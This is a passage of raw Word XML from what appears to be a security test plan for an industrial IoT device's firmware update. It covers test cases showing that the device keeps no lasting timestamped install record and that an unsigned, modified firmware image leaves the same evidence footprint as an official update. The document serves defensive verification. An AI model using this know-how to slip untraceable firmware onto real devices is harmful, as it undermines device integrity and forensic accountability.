          <w:p w14:paraId="3168C614" w14:textId="0A43935C" w:rsidR="006135F0" w:rsidRPr="006D5B99"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against RQ-008. A retained, time-stamped install record would refute the gap (investigate).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24E55D3F" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="006D5B99" w:rsidRDefault="006135F0" w:rsidP="006135F0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E370CB0" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="006D5B99" w:rsidRDefault="006135F0" w:rsidP="006135F0">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6D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048E7A32" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="006D5B99"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6135F0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FBA8E2" w14:textId="25739DD8" w:rsidR="006135F0" w:rsidRPr="006D5B99" w:rsidRDefault="00381EBE"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TC-RQ008-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C44601" w:rsidRPr="006D5B99"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C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C44601">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F46FE51" w14:textId="4EDD515F"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TIA laptop (rotary-switch/reboot control, triggering the update)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C44601" w:rsidRPr="006D5B99"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C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C44601">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05016536" w14:textId="40ADE791"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C44601" w:rsidRPr="006D5B99"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C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C44601">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9984C2"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E86FF0A" w14:textId="02855CDD"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cm_rq008-02_before.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF2E01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cm_rq008-02_systick_before.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8B10A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450A5851"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Enter update state and re-upload/install the OFFICIAL current firmware:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EAF5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Rotary switch to 999 + power cycle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D0036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Upload the official update container via IoT-Core Visualizer or curl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1E5344"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(see /firmware/container/start_stream_set + stream_set, as in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596D25ED"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TC-RQ005-03 step 3, but with the UNMODIFIED official file)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B54E737"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curl -s -X POST http://$SRIO/firmware/install</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1336F4F6"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restarts automatically as part of the install)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E603BE3"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p>
          <w:p w14:paraId="0CE647FD" w14:textId="5C05ED0C"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cm_rq008-02_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79646430" w14:textId="77777777" w:rsidR="00C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C4460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cm_rq008-02_systick_after.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412B3285" w14:textId="1B6476E2" w:rsidR="00C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C4460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cm_rq008-02_before.json cm_rq008-02_after.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C44601" w:rsidRPr="006D5B99"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4E72791" w:rsidR="00C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C44601">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECACB38" w14:textId="6E69ED8C" w:rsidR="00C44601" w:rsidRPr="006D5B99" w:rsidRDefault="00C44601" w:rsidP="00C4460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log is cleared by the install-triggered cold start and the systick resets to ~0; no persistent, timestamped record of the installation remains on the device itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CD3BF12" w14:textId="77777777" w:rsidR="000409F3" w:rsidRPr="006D5B99" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6490FC22" w14:textId="68EF4DFF" w:rsidR="000409F3" w:rsidRPr="006D5B99" w:rsidRDefault="00606028" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ008-03 - Legitimate vs Illegitimate: Evidence Cannot Classify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23073A31" w14:textId="77777777" w:rsidR="000409F3" w:rsidRPr="006D5B99" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B9D78E" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="006D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C3">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6D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1669EF22"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6D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ACB62E4" w14:textId="4BA7140F" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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2.8 (classification intent) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D, Asset I, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E1AABE" w14:textId="7037A1BD" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47EB5789" w14:textId="234B5286" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="454A0289" w14:textId="460AD848" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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evidence record cannot distinguish a legitimate update from an illegitimate one: installing a modified/unsigned image (installation performed per TC-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>005-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) produces the same </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>audit/version footprint as a genuine update, so the "legitimate OR illegitimate" evidence obligation is unmet. The cause, no signature verification, is RQ-005's protection gap; RQ-008 tests only the evidence footprint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DB44B4B"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the evidence delta of a legitimate update (from TC-RQ008-02). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C05700" w14:textId="53A26E13" w:rsidR="002D7115"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On the spare DUT, install the modified/unsigned image per TC-RQ005-03. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59945D9C" w14:textId="77777777" w:rsidR="0057225C"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Record its evidence delta (log entries, version change, any classification flag). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C658A69" w14:textId="29310B89" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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determine whether any evidence field marks the second install as illegitimate/</w:t>
            </w:r>
            <w:r w:rsidR="00BD0EAC" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>unauthorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156BA702" w14:textId="403BB3F9"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2A7D47" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42429431" w14:textId="77777777" w:rsidR="00425B4C"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illegitimate install produces an indistinguishable footprint (same completion semantics + version change, no authenticity flag) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the classification gap </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41EF9F37" w14:textId="5DF2AF79" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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Any field flagging the unsigned image as illegitimate would refute the gap (record as a positive finding).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FE391B0" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="006D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3858E820" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="006D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C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6D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="086F1C28" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="006D5B99"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CA26C3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A96738D" w14:textId="03134A33" w:rsidR="00CA26C3" w:rsidRPr="006D5B99" w:rsidRDefault="00326698"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TC-RQ008-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C35C2" w:rsidRPr="006D5B99"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7C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B62F7EF" w14:textId="1D3DBF8E"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spare unit </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C35C2" w:rsidRPr="006D5B99"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7C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65440495" w14:textId="3C655E05"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C35C2" w:rsidRPr="006D5B99"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7C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434594E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Take the evidence delta of a legitimate installation from TC-RQ008-02</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6F5C28"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as the reference.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2F415F"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Capture the evidence delta of the (in TC-RQ005-03 performed) manipulated</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EBC75C"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installation (log entries, firmware version string, any classification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414BD2D6"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flag):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E44159"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13ABB280" w14:textId="10E9EAD9"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cm_rq008-03_after_manipulated.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CEB90B2" w14:textId="77777777" w:rsidR="007C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C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http://$SRIO/firmware/version/getdata | tee cm_rq008-03_version_after.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E312472" w14:textId="341ADF58" w:rsidR="007C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C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3. Compare both deltas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C35C2" w:rsidRPr="006D5B99"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4AC7D5A8" w:rsidR="007C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5B6CF2" w14:textId="0100D301" w:rsidR="007C35C2" w:rsidRPr="006D5B99" w:rsidRDefault="007C35C2" w:rsidP="007C35C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both installation types produce an identical log/version footprint with no distinguishing feature (“legitimate” vs. </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:t xml:space="preserve">“illegitimate”) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:t xml:space="preserve"> confirms G-2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7190F831" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRPr="006D5B99" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1557A49C" w14:textId="683584D5" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ008-04 - </w:t>
      </w:r>
      <w:r w:rsidR="00A7483A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-Attribution across the Install Cold Start </w:t>
      </w:r>
      <w:r w:rsidR="00A7483A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="00A7483A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="00A7483A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>003-</w:t>
      </w:r>
      <w:r w:rsidR="00775452" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52BA6E" w14:textId="77777777" w:rsidR="004B2D32" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D32" w:rsidP="004B2D32">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C6EBEC"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4536A5D1"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49F1E33B" w14:textId="5697FEA4" w:rsidR="004B2D32" w:rsidRPr="006D5B99"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RQ-008 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.11 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
